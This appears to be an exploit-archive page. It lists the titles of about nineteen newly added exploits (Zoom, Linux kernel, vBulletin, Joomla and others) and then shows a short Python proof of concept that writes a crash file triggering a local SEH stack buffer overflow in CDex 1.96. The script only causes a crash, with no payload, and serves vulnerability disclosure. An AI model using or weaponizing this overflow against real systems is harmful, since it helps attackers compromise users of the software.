f76fbb1072
19 changes to exploits/shellcodes CDex 1.96 - Buffer Overflow Zoom Linux Client 2.0.106600.0904 - Command Injection Zoom Linux Client 2.0.106600.0904 - Stack-Based Buffer Overflow Firejail - Local Privilege Escalation Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape Linux kernel < 4.10.15 - Race Condition Privilege Escalation Outlook for Android - Attachment Download Directory Traversal Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit) GoAhead httpd 2.5 < 3.6.5 - 'LD_PRELOAD' Remote Code Execution Joomla! Component Guru Pro - SQL Injection Joomla! Component Guru Pro - 'Itemid' SQL Injection Joomla! Component User Bench 1.0 - 'userid' SQL Injection Joomla! Component My Projects 2.0 - SQL Injection vBulletin 5 - 'routestring' Unauthenticated Remote Code Execution vBulletin 5 - 'cacheTemplates' Unauthenticated Remote Arbitrary File Deletion Linksys WVBR0 - 'User-Agent' Remote Command Injection Joomla! Component JB Visa 1.0 - 'visatype' SQL Injection Joomla! Component Guru Pro - 'promocode' SQL Injection Monstra CMS 3.0.4 - Arbitrary File Upload / Remote Code Execution
27 lines
No EOL
666 B
Python
Executable file
27 lines
No EOL
666 B
Python
Executable file
#!/usr/bin/python
|
|
|
|
#
|
|
# Exploit Author: bzyo
|
|
# Twitter: @bzyo_
|
|
# Exploit Title: CDex 1.96 - Local Stack Buffer Overflow
|
|
# Date: 17-12-2017
|
|
# Vulnerable Software: CDex 1.96 (Unicode Build)
|
|
# Vendor Homepage: http://cdex.mu/
|
|
# Version: v1.96
|
|
# Software Link: http://cdex.mu/?q=download
|
|
# Tested On: Windows 7 x32
|
|
#
|
|
#
|
|
# PoC: generate crash.txt, open app, go to options, settings, encoding, tags, paste crash.txt contents in picture text
|
|
#
|
|
# app crashes; 00420042 Pointer to next SEH record; no unicode ppr pointers
|
|
#
|
|
|
|
|
|
file="crash.txt"
|
|
|
|
crash = "A"*520 + "B"*4 #seh
|
|
|
|
writeFile = open (file, "w")
|
|
writeFile.write( crash )
|
|
writeFile.close() |